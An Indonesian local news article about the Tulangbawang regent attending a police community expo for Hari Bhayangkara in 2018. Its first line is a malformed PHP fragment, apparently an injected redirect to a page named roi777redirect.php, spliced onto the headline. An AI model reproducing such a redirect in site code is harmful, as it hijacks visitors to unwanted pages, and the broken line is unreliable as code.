header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Bupati Winarti Hadiri Expo Lintas Komunitas II -
Bupati Winarti Hadiri Expo Lintas Komunitas II

TRANSLAMPUNG.COM, MENGGALA – Bupati Tulangbawang Hj. Winarti SE MH, menghadiri pembukaan Expo Jambore Lintas Komunitas II yang dilaksanakan Polres Tulangbawang, dalam rangka merayakan Hari Bhayangkara ke-72, Tahun 2018, Minggu, (1/7/18).

Dalam hajat Kapolres Tulangbawang AKBP Raswanto Hadiwibowo ini, selain dihadiri Bupati cantik Tulangbawang pasangan Wakil Bupati Hendriwansyah, turut hadir pula Danlanud Pangeran M Bunyamin Letkol PnB Ahmad Mulyono SE MM, Dandim 0426 TB Letkol Arm Kusfiandar Yusuf, Wakil Bupati Tulangbawang Barat Fauzi Hasan SE MM dan Ketua DPRD Tulangbawang Sopi’i SH.

Dijelaskan, Expo Jambore Lintas Komunitas II berisi berbagai kegiatan seperti acara otomotif, expo, lomba poto, turnamen olahraga, bhakti sosial, festival musik, gowes sepeda, lomba polisi cilik, event dan berbagai kegiatan lainnya.

Terselenggaranya kegiatan Expo Jambore Lintas Komunitas II oleh Polres Tulangbawang, bertepatan dalam merayakan Hari Bhayangkara ke-72, tentunya membuat bangga Bupati Tulangbawang Hj. Winarti SE MH, mengingat Kabupaten Tulangbawang menjadi meriah karena banyak acara yang bersifat positif dan bermasyarakat.

“Saya sangat mengapresiasi diadakannya berbagai kegiatan dan perlombaan ini. Karena dapat memupuk rasa kebersamaan dan solidaritas diantara kita dan masyarakat luas terutama masyarakat Tulangbawang yang saya cintai,” ucap Bupati perempuan pertama di Kabupaten Tulangbawang tersebut.

Untuk itu, sambung Bupati Gotong Royong ini, bilamana kedepan ada kegiatan positif lainnya, tentu Bupati dan Wakil Bupati Tulangbawang, Winarti-Hendriwansyah (Win-Hendri) akan mensuport dan mendukung agar dapat terlaksana dengan baik, apalagi kegiatan positif yang berkaitan dengan masyarakat.

“Maka, dengan terlaksananya berbagai kegiatan di Kabupaten Tulangbawang, semoga dapat menjadi sebuah gambaran bagi masyarakat luas dari Visi Pemerintah, yakni terwujudnya Kabupaten Tulangbawang yang aman mandiri dan sejahtera,” tukas Bupati.

Saat di Mapolres Tulangbawang, Bupati Bergerak Melayani Warga (BMW) ini juga terlihat memberikan doorprize kepada para peserta dan Polwan yang mengikuti ataupun memeriahkan kegiatan, dan hal ini dilakukannya sebagai ungkapan apresiasi atas semangat dan kekompakan yang terjalin antar para peserta.(als)

News Reporter